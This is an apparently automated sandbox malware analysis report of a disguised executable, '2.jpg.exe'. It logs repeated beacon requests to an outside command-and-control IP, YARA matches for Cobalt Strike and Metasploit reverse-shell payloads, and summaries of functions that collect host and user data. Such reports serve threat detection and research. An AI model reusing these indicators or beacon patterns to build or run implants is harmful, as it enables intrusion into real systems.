Apr 19, 2024 09:53:57.236605883 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:57.568636894 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:57 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
305	192.168.2.4	50041	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:57.994777918 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:58.318263054 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
306	192.168.2.4	50042	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:58.766441107 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:59.109419107 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:58 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
307	192.168.2.4	50043	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:53:59.545480013 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:53:59.871138096 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:53:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
308	192.168.2.4	50044	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:54:00.296542883 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:54:00.608707905 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:54:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
309	192.168.2.4	50045	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:54:01.042745113 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:54:01.366205931 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:54:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
310	192.168.2.4	50046	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:54:01.806704044 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:54:02.138995886 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:54:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
311	192.168.2.4	50047	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:54:02.568844080 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:54:02.886373043 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:54:02 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
312	192.168.2.4	50048	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:54:03.324182987 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:54:03.647649050 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:54:03 GMT Content-Type: application/octet-stream Content-Length: 0

Target ID:	0
Start time:	09:49:57
Start date:	19/04/2024
Path:	C:\Users\user\Desktop\2.jpg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2.jpg.exe"
Imagebase:	0x290000
File size:	34'304 bytes
MD5 hash:	93FB70BF6B2FC6DA414D9E6A80ECDA4F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Shellcode_Generic_8c487e57, Description: unknown, Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000002.4124836777.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Shellcode_Generic_8c487e57, Description: unknown, Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1672509121.0000000000292000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4125949262.0000000006360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.4124836777.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	9.6%
Total number of Nodes:	571
Total number of Limit Nodes:	20

Executed Functions

Function 06766C99 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F52
Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F62

GetUserNameA.ADVAPI32(?,?), ref: 06766CFE
GetComputerNameA.KERNEL32(?,?), ref: 06766D0E

Part of subcall function 06762BF0: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 06762C10

GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 06766D22
_strrchr.LIBCMT ref: 06766D31
GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 06766D4C
__snprintf.LIBCMT ref: 06766DB8

Strings

%s%s%s, xrefs: 06766DAF

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Name$_malloc$ComputerFileModuleSocketUserVersion__snprintf_strrchr
String ID: %s%s%s
API String ID: 56250281-1891519693
Opcode ID: 2aa0d17927a37bd948fccb60d1b89d976c46073f70162bff5089b8f8ed06be69
Instruction ID: 82357292d06af551f6060b0eff639445e33ae7b2c632d8304c3d7c07000b3ee2
Opcode Fuzzy Hash: 2aa0d17927a37bd948fccb60d1b89d976c46073f70162bff5089b8f8ed06be69
Instruction Fuzzy Hash: 0E418C71D00209AEDFD5AFA2DC499BEBFB5EF04310F604059FA20A6251EB769A00DB61

Uniqueness

Uniqueness Score: -1.00%

Function 06767AF5 Relevance: 9.1, APIs: 6, Instructions: 113
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 06767B19

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

htonl.WS2_32(?), ref: 06767B45
recvfrom.WS2_32(00000000,?,000FFFFC,00000000,000000FF,?), ref: 06767B74
WSAGetLastError.WS2_32 ref: 06767B7F

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
String ID:
API String ID: 987280018-0
Opcode ID: 01e2d8b2e9d0810c7cfc03b0d01e14c178586ed88c84026550e228b2a5090573
Instruction ID: f842bc0dcdb12fa4edda76df34f4137001e8b62311580fec263912de6fabf5ea
Opcode Fuzzy Hash: 01e2d8b2e9d0810c7cfc03b0d01e14c178586ed88c84026550e228b2a5090573
Instruction Fuzzy Hash: 23410272C00608EFEBA5CF65DC05A7E77B9EB0036CF208629FA12E2190D7705D41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0676C187 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,00000000,00000000,?,?,0676C1FD,?,06766E20,?,06766E20,?), ref: 0676C1AA
CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,0676C1FD,?,06766E20,?,06766E20,?), ref: 0676C1BD
CryptGenRandom.ADVAPI32(00000000,06766E20,?,?,?,0676C1FD,?,06766E20,?,06766E20,?), ref: 0676C1D1
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,0676C1FD,?,06766E20,?,06766E20,?), ref: 0676C1E1

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 0676C19E, 0676C1A3, 0676C1B7

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-291530887
Opcode ID: 86fe527011eae224814ce73b83158dcf1be3a8d920ffdbf8fed96a8ecb10ec53
Instruction ID: 65cf16c4665652d8096f0fb472627c494fb361782c3969ecf544708fd39fcc97
Opcode Fuzzy Hash: 86fe527011eae224814ce73b83158dcf1be3a8d920ffdbf8fed96a8ecb10ec53
Instruction Fuzzy Hash: 03F0AF7A991218FBDF618692CD09FDF7B6DEB49760F208011FE40E2040D2B0AA009BE0

Uniqueness

Uniqueness Score: -1.00%

Function 05F300B5 Relevance: 4.7, APIs: 3, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4125800908.0000000005F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f30000_2.jbxd

Yara matches

Similarity

API ID: Internet$AllocErrorFileHttpOpenReadRequestVirtual
String ID:
API String ID: 825455464-0
Opcode ID: c8cf44e1337c9b0d0320aaea6eca53087fc76f8405691af1cbce4ef84ad70f95
Instruction ID: 6c38f777134ef3ad03b23f609191749caa1f527d47306704faccdd702e46359c
Opcode Fuzzy Hash: c8cf44e1337c9b0d0320aaea6eca53087fc76f8405691af1cbce4ef84ad70f95
Instruction Fuzzy Hash: 7551FC6260D3847AF7218B318C8FE777F8DEF82750B18019EE4925B1D2DD84D801C3AA

Uniqueness

Uniqueness Score: -1.00%

Function 06762972 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 067629B3
__snprintf.LIBCMT ref: 067629DA

Part of subcall function 067682AE: _memset.LIBCMT ref: 067682CF

__snprintf.LIBCMT ref: 06762A21
__snprintf.LIBCMT ref: 06762A38
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,0678E540,06796C58), ref: 06762A67
HttpSendRequestA.WININET(00000000,?,?,06762B52,?), ref: 06762A90
InternetCloseHandle.WININET(00000000), ref: 06762AAD
InternetQueryDataAvailable.WININET(00000000,06761544,00000000,00000000), ref: 06762ABE
InternetReadFile.WININET(00000000,?,00001000,?), ref: 06762AEC
InternetCloseHandle.WININET(00000000), ref: 06762B0C
InternetCloseHandle.WININET(00000000), ref: 06762B2D

Strings

%s%s, xrefs: 06762A31
*/*, xrefs: 0676299A

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle__snprintf$HttpRequest_memset$AvailableDataFileOpenQueryReadSend
String ID: %s%s$*/*
API String ID: 2581463937-856325523
Opcode ID: 1ec1b58bf38f3e5b244d35c9a5944896f36b14c16851c998041ce3f82584e60d
Instruction ID: be87edc698ff267a6fddb7aa810802f508e307380c07c8bae2df16fa498bf705
Opcode Fuzzy Hash: 1ec1b58bf38f3e5b244d35c9a5944896f36b14c16851c998041ce3f82584e60d
Instruction Fuzzy Hash: FD518D72D00109BFDFA1AFA6DC84DBE7BBEEF05314F104425FA24A7141EA319A45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 06766DF0 Relevance: 12.1, APIs: 8, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetACP.KERNEL32(00000000,00000000,00000080,?,?,?,?,?,?,?,?,067614A7,00000000,00000000), ref: 06766DF9
GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,067614A7,00000000,00000000), ref: 06766E05
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,067614A7,00000000), ref: 06766E32
GetTickCount.KERNEL32 ref: 06766E36

Part of subcall function 06775CDA: __getptd.LIBCMT ref: 06775CDF

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,067614A7,00000000), ref: 06766E63
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,067614A7,00000000), ref: 06766EC9
_memset.LIBCMT ref: 06766F00
_memset.LIBCMT ref: 06766F3F

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

Associated: 00000000.00000002.4126125579.0000000006794000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.0000000006796000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4126125579.000000000679F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6760000_2.jbxd

Yara matches

Similarity

API ID: CurrentProcess$_memset$CountTick__getptd
String ID:
API String ID: 3908538216-0
Opcode ID: 448e4a673df00366ef3ec5095176298033e183d7a7c7fd9955a9964ced044232
Instruction ID: 05457d7a75de83fc8e7160495f6a354384794641f5f618a4a2cdbbdba85c1a9a
Opcode Fuzzy Hash: 448e4a673df00366ef3ec5095176298033e183d7a7c7fd9955a9964ced044232
Instruction Fuzzy Hash: D331D572C002087EDBD1BBB6EC4DAAE3BA99F08224F544416FF34E7181EE35DA448665

Uniqueness

Uniqueness Score: -1.00%

Function 0676131C Relevance: 7.8, APIs: 5, Instructions: 280
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F52
Part of subcall function 06766F4C: _malloc.LIBCMT ref: 06766F62

_malloc.LIBCMT ref: 067613A4

Part of subcall function 067758CD: __FF_MSGBANNER.LIBCMT ref: 067758F0
Part of subcall function 067758CD: __NMSG_WRITE.LIBCMT ref: 067758F7
Part of subcall function 067758CD: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,0677D8A9,00000000,00000001,00000000,?,0677766D,00000018,06790748,0000000C,067776FE), ref: 06775944

Part of subcall function 0676BC8C: _malloc.LIBCMT ref: 0676BCB3
Part of subcall function 0676BC8C: _memset.LIBCMT ref: 0676BCE1

Part of subcall function 0676BC8C: _realloc.LIBCMT ref: 0676BCC2

_malloc.LIBCMT ref: 0676146D
__snprintf.LIBCMT ref: 067614D6
__snprintf.LIBCMT ref: 067614F4
__snprintf.LIBCMT ref: 06761512

Part of subcall function 0676B5FE: Sleep.KERNEL32(000003E8,00000000,00000000,0676167C), ref: 0676B634
Part of subcall function 0676B5FE: ExitThread.KERNEL32 ref: 0676B63E

Part of subcall function 06768E9C: htonl.WS2_32(00000000), ref: 06768EB3
Part of subcall function 06768E9C: htonl.WS2_32(?), ref: 06768EBC
Part of subcall function 06768E9C: _memset.LIBCMT ref: 06768EE5

Memory Dump Source

Source File: 00000000.00000002.4126125579.0000000006760000.00000040.00001000.00020000.00000000.sdmp, Offset: 06760000, based on PE: true

